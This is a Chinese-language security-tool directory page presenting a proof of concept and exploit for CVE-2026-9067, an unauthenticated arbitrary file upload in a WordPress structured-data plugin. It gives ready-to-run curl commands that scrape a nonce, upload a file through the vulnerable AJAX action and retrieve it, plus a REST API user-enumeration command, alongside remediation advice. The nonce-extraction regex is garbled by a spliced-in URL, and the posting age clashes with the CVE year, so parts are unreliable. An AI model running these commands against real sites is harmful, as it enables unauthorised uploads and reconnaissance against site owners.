Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data for WP & AMP < 1.60 - 未经认证的任意媒体上传 [POC & Xploit] | Kitploit
工具/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data for WP & AMP < 1.60 - 未经认证的任意媒体上传 [POC & Xploit]

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
32个月前尚未审核

POC & Xploit - 概念验证目录

针对WordPress安全测试环境中发现的漏洞的文档和利用工具。


漏洞列表

CVE ID插件严重性类型状态
CVE-2026-9067Schema & Structured Data for WP & AMP高 (8.1)任意文件上传已记录

CVE-2026-9067

快速摘要

漏洞描述

插件 Schema & Structured Data for WP & AMP 在 1.60 版本之前,未验证 AJAX 处理程序中用于文件上传的用户权限,也未验证上传的文件类型。这使得未认证的攻击者可以上传任意文件。

影响

  • 内容托管:攻击者可以在受害者域名上托管恶意内容
  • 磁盘消耗:上传任意文件可能耗尽磁盘空间
  • 声誉滥用:从受害者域名分发恶意软件、钓鱼页面

重要提示:WordPress 核心会阻止可执行文件(.php、.phtml、.html、.svg),因此该漏洞不存在直接的 RCE 路径。

文件

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # 完整文档(本文件)
├── CVE-2026-9067.py       # 带有多线程功能的 Python 利用脚本
├── CVE-2026-9067.sh       # Bash/Shell PoC 脚本
└── CVE-2026-9067_exploit.sh  # 替代 Bash PoC 脚本

快速 PoC

root@kitploit:~
# 步骤 1:获取 nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# 步骤 2:上传任意文件
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# 步骤 3:访问上传的文件
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

环境信息


测试命令

检查站点状态

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

检查插件版本

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

枚举用户

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

修复措施

  1. 升级插件:将 Schema & Structured Data for WP & AMP 更新到 1.60 或更高版本
  2. 禁用插件:如果无法升级,则禁用该插件
  3. 加固:
    • 设置 DISALLOW_FILE_MODIFICATIONS 常量
    • 通过 .htaccess 禁止在 uploads 目录中执行 PHP
    • 实施 WAF 规则

参考

  • NVD CVE-2026-9067
  • WPScan 漏洞数据库
  • WordPress 插件页面
  • 原始研究人员:0xBassia
下载工具
字段值
CVE IDCVE-2026-9067
插件Schema & Structured Data for WP & AMP
受影响版本< 1.60
CWECWE-434(危险类型文件的不受限制上传)
CVSS v3.18.1(高)
发现者0xBassia
字段值
目标 URLhttps://yorbit7.ddev.site
PHP 版本8.4
数据库MariaDB 11.8
WordPress 版本7.0
测试方法基于 curl(黑盒测试)